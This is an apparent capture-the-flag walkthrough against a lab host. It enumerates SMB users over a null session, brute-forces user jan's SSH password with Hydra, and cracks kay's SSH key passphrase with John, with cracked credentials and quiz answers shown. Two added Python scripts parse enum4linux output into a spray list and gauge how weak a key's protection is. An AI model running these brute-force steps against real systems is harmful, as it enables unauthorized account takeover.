User brute-forcing to find the username & password
Running Enum4Linux - To enumerate SMB
enum4linux -a 10.10.21.87
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 9 22:26:17 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.21.87
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.21.87    |
 ===================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================= 
|    Nbtstat Information for 10.10.21.87    |
 ============================================= 
Looking up status of 10.10.21.87
    BASIC2          <00> -         B <ACTIVE>  Workstation Service
    BASIC2          <03> -         B <ACTIVE>  Messenger Service
    BASIC2          <20> -         B <ACTIVE>  File Server Service
    ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
    WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
    WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

    MAC Address = 00-00-00-00-00-00

 ====================================== 
|    Session Check on 10.10.21.87    |
 ====================================== 
[+] Server 10.10.21.87 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.21.87    |
 ============================================ 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================= 
|    OS information on 10.10.21.87    |
 ======================================= 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.21.87 from smbclient: 
[+] Got OS info for 10.10.21.87 from srvinfo:
    BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
    platform_id     :   500
    os version      :   6.1
    server type     :   0x809a03

 ============================== 
|    Users on 10.10.21.87    |
 ============================== 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.
Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================== 
|    Share Enumeration on 10.10.21.87    |
 ========================================== 

    Sharename       Type      Comment
    ---------       ----      -------
    Anonymous       Disk      
    IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.21.87
//10.10.21.87/Anonymous    Mapping: OK, Listing: OK
//10.10.21.87/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ===================================================== 
|    Password Policy Information for 10.10.21.87    |
 ===================================================== 
[+] Attaching to 10.10.21.87 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
    [+] BASIC2
    [+] Builtin
[+] Password Info for Domain: BASIC2
    [+] Minimum password length: 5
    [+] Password history length: None
    [+] Maximum password age: 37 days 6 hours 21 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: None
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: 37 days 6 hours 21 minutes 
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5

 =============================== 
|    Groups on 10.10.21.87    |
 =============================== 
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 ======================================================================== 
|    Users on 10.10.21.87 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-502 *unknown*\*unknown* (8)
..
S-1-5-21-2853212168-2008227510-3551253869-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
..
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

 ============================================== 
|    Getting printer info for 10.10.21.87    |
 ============================================== 
No printers returned.
RID cycling against the S-1-22-1 (Unix users) SID turns up two local accounts: jan and kay. Note that the whole enumeration ran over a null session (username '' / password ''), which the server explicitly allows; that anonymous access is what makes the share, policy and user enumeration above possible without any credentials. The Samba password policy also reports Account Lockout Threshold: None and complexity disabled. Keep in mind that this is Samba's policy, not sshd's, so on its own it does not guarantee that password guessing over SSH is free of lockout or rate limiting.
Next we brute-force jan's password, because the text file we found earlier in the /development directory had K (kay) noting that J's (jan's) password was easily crackable.
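Turning enum4linux output into a hydra-ready username list is usually done by eye, as above; the script below does it mechanically and also pulls out the two facts that decide whether online guessing is sensible (null session allowed, lockout threshold). This is an added example, not code from the original walkthrough or from enum4linux itself; SAMPLE is a constructed excerpt that copies the shape of the RID-cycling, session-check and password-policy lines in the output above, and the function names and the WELL_KNOWN exclusion set are my own choices.

```python
"""Parse enum4linux (v0.8.x text format) into users, groups and a lockout check."""
import re

# Constructed excerpt patterned on the enum4linux output above (not a new capture).
SAMPLE = r"""
[+] Server 10.10.21.87 allows sessions using username '', password ''
    [+] Minimum password length: 5
    [+] Account Lockout Threshold: None
S-1-5-21-2853212168-2008227510-3551253869-500 *unknown*\*unknown* (8)
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
"""

# One resolved RID line: "<base SID>-<rid> <domain>\<name> (Local User|Local Group|...)".
# Unresolved RIDs end in "(8)" instead, so they fall through on purpose.
SID_RE = re.compile(
    r"^(?P<sid>S-1-[\d-]+)-(?P<rid>\d+)\s+(?P<domain>.+?)\\(?P<name>.+?)\s+"
    r"\((?P<kind>Local User|Local Group|Domain User|Domain Group)\)$"
)
NULL_SESSION_RE = re.compile(r"allows sessions using username '', password ''")
POLICY_RE = {
    "min_password_length": re.compile(r"Minimum password length:\s*(\S+)"),
    "lockout_threshold": re.compile(r"Account Lockout Threshold:\s*(\S+)"),
}
# Accounts present on every Samba/Unix host that are not worth spraying (my list).
WELL_KNOWN = {"nobody", "guest", "krbtgt"}


def _policy_value(raw):
    """enum4linux prints 'None' for unset policy values and digits otherwise."""
    return None if raw == "None" else int(raw)


def parse_enum4linux(text):
    """Extract users, groups, null-session status and the lockout policy."""
    report = {"users": [], "groups": [], "null_session": False,
              "min_password_length": None, "lockout_threshold": None}
    for raw in text.splitlines():
        line = raw.strip()
        if NULL_SESSION_RE.search(line):
            report["null_session"] = True
            continue
        for key, rx in POLICY_RE.items():
            m = rx.search(line)
            if m:
                report[key] = _policy_value(m.group(1))
        m = SID_RE.match(line)
        if not m:
            continue
        entry = {"sid": f"{m['sid']}-{m['rid']}", "rid": int(m["rid"]),
                 "domain": m["domain"], "name": m["name"]}
        bucket = "users" if m["kind"].endswith("User") else "groups"
        report[bucket].append(entry)
    return report


def spray_candidates(report):
    """Usernames worth feeding to hydra -L, in discovery order, deduplicated."""
    seen = []
    for user in report["users"]:
        name = user["name"].lower()
        if name not in WELL_KNOWN and name not in seen:
            seen.append(name)
    return seen


def lockout_note(report):
    """One-line assessment of whether online guessing risks locking accounts."""
    threshold = report["lockout_threshold"]
    if threshold is None:
        return "no SMB lockout threshold; SSH limits come from sshd/PAM, not Samba"
    return f"SMB lockout after {threshold} failures; throttle guesses accordingly"


if __name__ == "__main__":
    rep = parse_enum4linux(SAMPLE)
    print("null session:", rep["null_session"])
    print("users for hydra -L:", spray_candidates(rep))
    print(lockout_note(rep))
```

Feed the real enum4linux output in via a file and write spray_candidates() to a users.txt for hydra -L; the lockout_note() reminder is there because a Samba policy of "None" says nothing about fail2ban or MaxAuthTries on the SSH side.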
HYDRA:
Using Hydra to brute-force jan's SSH password with rockyou.txt
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.21.87 -t 4 | tee hydra.out
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-09 22:14:13
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://10.10.21.87:22/
[STATUS] 44.00 tries/min, 44 tries in 00:01h, 14344355 to do in 5433:29h, 4 active
[STATUS] 28.00 tries/min, 84 tries in 00:03h, 14344315 to do in 8538:17h, 4 active
[STATUS] 29.14 tries/min, 204 tries in 00:07h, 14344195 to do in 8203:23h, 4 active
[STATUS] 28.07 tries/min, 421 tries in 00:15h, 14343978 to do in 8517:49h, 4 active
[22][ssh] host: 10.10.21.87   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-09 22:43:05

Note the throughput: with -t 4 Hydra manages under 30 tries per minute against this SSH service, and its own estimate for exhausting rockyou.txt is in the thousands of hours. The run only worked because it finished in under half an hour, i.e. jan's password sat within the first few hundred entries of the list. Against a real target you would trim the wordlist using what you already know (the five-character minimum from the SMB policy, the hint in the note) rather than throw the whole file at the service.
It asks for a password, but we don't have it yet.
What is the name of the other user you found(all lower case)?
Answer: kay
If you have found another user, what can you do with this information?
Answer: We can try to escalate our privileges to gain root access. Maybe that user has additional permissions that can be exploited to gain root.
Now we'll brute-force the passphrase on kay's SSH private key with John the Ripper.
First convert the id_rsa file with ssh2john.py so that John gets a hash it can attack.
root@kali:~# /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt
root@kali:~# john forjohn.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_id_rsa)
Session completed
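John's cost lines tell you in advance how hard a key will be to crack, and it is worth checking them before committing to a wordlist run. The script below does the same triage directly on the key file: it recognises the legacy PEM format (a DEK-Info header, where OpenSSL's MD5-based EVP_BytesToKey derives the cipher key from the passphrase in a single pass, which is the "0=MD5/AES, iteration count 1" case John reported above) and the current openssh-key-v1 format (cipher, KDF and bcrypt round count stored in the blob). It also implements that legacy KDF so you can see exactly how little work each candidate passphrase costs. This is an added example, not code from the walkthrough, from John or from OpenSSH; the two key fixtures are constructed (a legacy header with a dummy body and a minimal openssh-key-v1 preamble), not real keys, and the function names are my own.

```python
"""Triage an SSH private key's passphrase protection before trying to crack it."""
import base64
import hashlib
import re
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"
# Key lengths for the ciphers OpenSSL writes into a legacy DEK-Info header.
PEM_KEY_LEN = {"AES-128-CBC": 16, "AES-192-CBC": 24,
               "AES-256-CBC": 32, "DES-EDE3-CBC": 24}


def _ssh_string(buf, off):
    """Read one uint32-length-prefixed string from an SSH wire-format blob."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def _ssh_encode(*parts):
    """Inverse of _ssh_string; used only to build the constructed fixture."""
    return b"".join(struct.pack(">I", len(p)) + p for p in parts)


def evp_bytes_to_key(passphrase, salt, key_len):
    """OpenSSL's legacy KDF with count=1: chain MD5(prev || passphrase || salt[:8])
    until key_len bytes exist. No stretching, so each guess is one or two MD5s."""
    out, prev = b"", b""
    while len(out) < key_len:
        prev = hashlib.md5(prev + passphrase + salt[:8]).digest()
        out += prev
    return out[:key_len]


def triage_key(pem_text):
    """Report format, cipher, KDF and work factor for a PEM-encoded private key."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        off = len(OPENSSH_MAGIC)
        cipher, off = _ssh_string(blob, off)
        kdf, off = _ssh_string(blob, off)
        kdfopts, off = _ssh_string(blob, off)
        rounds = 0
        if kdf == b"bcrypt":  # kdfoptions = string(salt) || uint32(rounds)
            _salt, o = _ssh_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh-key-v1", "cipher": cipher.decode(),
                "kdf": kdf.decode(), "rounds": rounds,
                "encrypted": cipher != b"none"}
    m = re.search(r"^DEK-Info:\s*([A-Z0-9-]+),([0-9A-Fa-f]+)\s*$", pem_text, re.M)
    if m is None:
        return {"format": "pem", "cipher": "none", "kdf": "none",
                "rounds": 0, "encrypted": False}
    cipher, iv = m.group(1), bytes.fromhex(m.group(2))
    return {"format": "pem", "cipher": cipher, "kdf": "EVP_BytesToKey-MD5",
            "rounds": 1, "encrypted": True, "iv": iv,
            "key_len": PEM_KEY_LEN.get(cipher)}


def legacy_candidate_key(pem_text, passphrase):
    """Derive the cipher key a candidate passphrase yields for a legacy PEM key.
    The salt is the first 8 bytes of the DEK-Info IV. Confirming the guess
    additionally needs one CBC decrypt of the first block (what John does)."""
    info = triage_key(pem_text)
    if info["kdf"] != "EVP_BytesToKey-MD5":
        raise ValueError("not a legacy DEK-Info key")
    return evp_bytes_to_key(passphrase.encode(), info["iv"], info["key_len"])


# Constructed fixtures, not real keys.
LEGACY_PEM = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAA
-----END RSA PRIVATE KEY-----
"""


def _build_openssh_fixture(cipher=b"aes256-ctr", kdf=b"bcrypt", rounds=16):
    """Minimal openssh-key-v1 preamble carrying only cipher/KDF/rounds and nkeys=1."""
    kdfopts = _ssh_encode(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = OPENSSH_MAGIC + _ssh_encode(cipher, kdf, kdfopts) + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


OPENSSH_PEM = _build_openssh_fixture()

if __name__ == "__main__":
    print(triage_key(LEGACY_PEM))
    print(triage_key(OPENSSH_PEM))
    print(legacy_candidate_key(LEGACY_PEM, "beeswax").hex())
```

A legacy key (rounds 1, one MD5 per guess) is in the same cost class John reported for kay_id_rsa; an openssh-key-v1 key with bcrypt and 16 or more rounds costs thousands of times more per guess, which is the practical reason to generate keys with ssh-keygen -o (the default in current OpenSSH) and a real passphrase.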
John's cost lines ("KDF/cipher ... is 0", "iteration count is 1") show that the key is in the legacy PEM format, where the passphrase goes through a single pass of MD5-based key derivation rather than bcrypt with many rounds; that is why the crack finished quickly. Now log in with the SSH private key and supply the passphrase when prompted.
Private keys (id_rsa) can fall into our hands in a variety of ways, for example read access to a home directory via LFI, or a command injection that lets us run commands on the host, so it is always worth checking whether the key is passphrase-protected and, if so, how strongly.